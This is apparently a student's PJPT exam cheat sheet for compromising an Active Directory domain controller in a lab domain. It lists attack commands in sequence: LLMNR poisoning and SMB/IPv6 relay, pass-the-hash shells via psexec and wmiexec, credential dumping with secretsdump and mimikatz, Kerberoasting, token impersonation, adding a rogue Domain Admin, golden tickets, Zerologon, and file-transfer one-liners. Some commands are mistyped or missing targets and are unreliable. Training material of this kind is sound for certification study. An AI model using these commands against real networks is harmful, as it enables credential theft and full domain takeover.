
This is CheatSheet which I used on PJPT exam to fully compromise Domain Controller by doing internal network penentration testing.

Hi, I'm Dr4ks! 👋

🚀 About Me

I'm a Cyber Security student.

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Introduction is here!


Discovering email addresses(links)=>






Gathering breached credentials=>



Hunting Subdomains=>


sublist3r -d tesla.com -t 100

Identifying website technologies=>


wappanalyzer tool

whatweb https://tesla.com

Google Dorking=>

site:tesla.com (returns results from only tesla.com website)

-www (remove results which have 'www' values)

filetype:docx (return results which filetype is docx.)


arp-scan -l  
netdiscover -r
nmap -T4 -p- -sS -A

Initial attacks for Active Directory

LLMNR Poisoning=> LLMNR

How to do=>

1.Open responder:

responder -I tun0 -dwPv 

2.Write your ip as this format to search on File Explorer


3.Responder will give you result,you will crack in this way.

hashcat -m 5600 hash.txt /usr/share/wordlists  rockyou.txt

SMB Relay=> For this attack works, SMB Signing must be disabled.

1.Checking SMB signing:

nmap --script=smb2-security-mode.nse -p445

2.Open responder:

responder -I tun0 -dwPv 

3.Make configurations for responder tool here, '/etc/responder/Responder.conf' You need to disable (make OFF) HTTP and SMB

4.Set up your relay

sudo ntlmrelayx.py -tf targets.txt -smb2support

5.Write your ip as this format to search on File Explorer


Reminder! Run commands via ntlmrelayx.py

sudo ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"

Gaining Shell Access=>

First Way: We can use Metasploit for this.

use exploit/windows/smb/psexec
set SMBDomain MARVEL.local
set SMBUser fcastle
set SMBPass Password1

Second Way: We can use psexec.py to access

psexec.py marver.local/fcastle:'Password1'@

Third way: Again, we use psexec.py to access , but with user's hashes (LM:NT), it is like Pass-The-Hash attack

psexec.py administrator@ --hashes [LM-HASH]:[NTLM-HASH]

Fourth Way: If psexec.py doesn't work for third way, you need to use wmiexec.py as below.

wmiexec.py administrator@ --hashes [LM-HASH]:[NTLM-HASH]

IPv6 attacks=>

1.Open mitm6 for target domain

sudo mitm6 -d marvel.local

2.At the same time, open ntlmrelayx.py

ntlmrelayx.py -6 -t ldaps:// -wh fakewpad.marvel.local -l lootme

3.You will get results like this from '/home/kali/lootme/domain_computers.html'

Post Compromise Enumeration for Active Directory

Domain Enumeration with ldapdomaindump=> 1.Run below command

sudo ldapdomaindump ldaps:// -u 'MARVEL\fcastle\' -p Password1

2.Then do ls command to see all things.

Domain Enumeration with bloodhound-python=> 1.Run below command -ns option means your DC(Domain Controller's IP)

sudo bloodhound-python -d MARVEL.local -u fcastle -p Password1 -ns [DC-IP] -c all 

2.Then do ls command to see all things. If you want to see via GUI, you just upload .json file into Bloodhound.

Domain Enumeration with Plumhound=>

When you do below command, Bloodhound should be up! 1.

sudo python3 PlumHound.py --easy -p [YOUR_PASS]

2.Another thing for all.

sudo python3 PlumHound.py -x tasks/default.tasks -p [YOUR_PASS]

3.Finally, by opening Firefox, you can look at results.

Post Compromise Attacks for Active Directory

Pass the Password=>

crackmapexec smb -u fcastle -d MARVEL.local -p Password1

Grab some local hashes=>

First Way:

For this, we can use meterpreter by using hashdump.

use windows/smb/psexec
hasdump #you will get hashes of users.

Second Way:

secretsdump.py MARVEL.local/fcastle:Password1@

Third Way:

secretsdump.py administrator:@ --hashes [LM-HASH]:[NT-HASH]

Pass the Hash=>

crackmapexec smb -u administrator -H [USER-HASH]

Reminder! Cheatsheet of crackmapexec

--local-auth : authenticate locally to each target

--sam : dump SAM hashes from target systems.

--lsa : dump LSA secrets from target systems.

--shares: enumerate shares and access

-L : List available modules for each protocol

-M : Specify module

How to use available module for crackmapexec?

crackmapexec smb -u administrator -H [USER-HASH] --local-auth -M lsassy

Reminder! If you want to access database of crackmapexec, you just need to use cmedb command


1.Get SPNs

python GetUserSPNs.py MARVEL.local/fcastle:Password1 -dc-ip [DC_IP] -request

2.Crack the hash

hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt

Token Impersonation=>

To see all tickets on meterpreter

meterpreter > list_tokens -u

To impersonate user:

meterpreter > impersonate_token MARVEL\\administrator

To dump hashes:

mimikatz(powershell) # privilege::debug
mimikatz(powershell) # LSADump::LSA /patch

How to add a new user:

net user /add hawkeye Password1@ /domain

How to add user into group:

net group "Domain Admins" hawkeye /ADD /DOMAIN

GPP attack(cPassword attack)=> Sample Groups.xml file=> image3

Cracking password=> image4

Credential Dumping with Mimikatz=>


Below command is must on Mimikatz!

mimikatz # privilege::debug

Reminder! When you write module_name then put "::" then , clicking Tab, you can get HELP

1.sekurlsa : This module is used to enumerate credentials. Example:

mimikatz # sekurlsa:logonPasswords

After compromising Domain

Dumping NTDS.dit=>

secretsdump.py MARVEL.local/pparker:'Password2'@ -just-dc-ntlm 

Golden Ticket Attacks=>

1.First, we get NTLM hash ,SID and relative ID of krbtgt account from KDC

mimikatz # privilege::debug
mimikatz # lsadump::lsa /inject /name:krbtgt

2.Then using above creds, we just create golden ticket.

kerberos::golden /User:Administrator /domain:marvel.local /sid:[SID_VALUE] /krbtgt:[KRBTGT_NTLM_HASH] /id:[RELATIVE_ID] /ptt

Additional AD attacks

CVE-2020-1472=> This is Abusing Zerologon.


How to do=>

1.We get Administrator hash from here

secretsdump.py -just-dc MARVEL/HYDRA-DC\$@

2.Now ,we need to get 'plain_password_hex' by using hash in below format.

secretsdump.py administrator@ --hashes [LM:NTLM_HASH]

3.Now, we use script from Github as below

python3 restorepassword.py MARVEL/HYDRA-DC@HYDRA-DC -target-ip -hexpass [HEX_VALUE]

CVE-2021-1675=> This is PrintNightmare


How to check this=> For this, we use rpcdump.py script

rpcdump.py @ | egrep 'MS-RPRN|MS-PAR'

AD Case Studies

Case 1: https://tcm-sec.com/pentest-tales-001-you-spent-how-much-on-security Case 2: https://tcm-sec.com/pentest-tales-002-digging-deep

Post Exploitation

File Transfers=>

1.Powershell for Windows

certutil.exe --urlcache -f file.txt

2.Open HTTP server to share files on directory

python3 -m http.server --bind [your_ip] [port]


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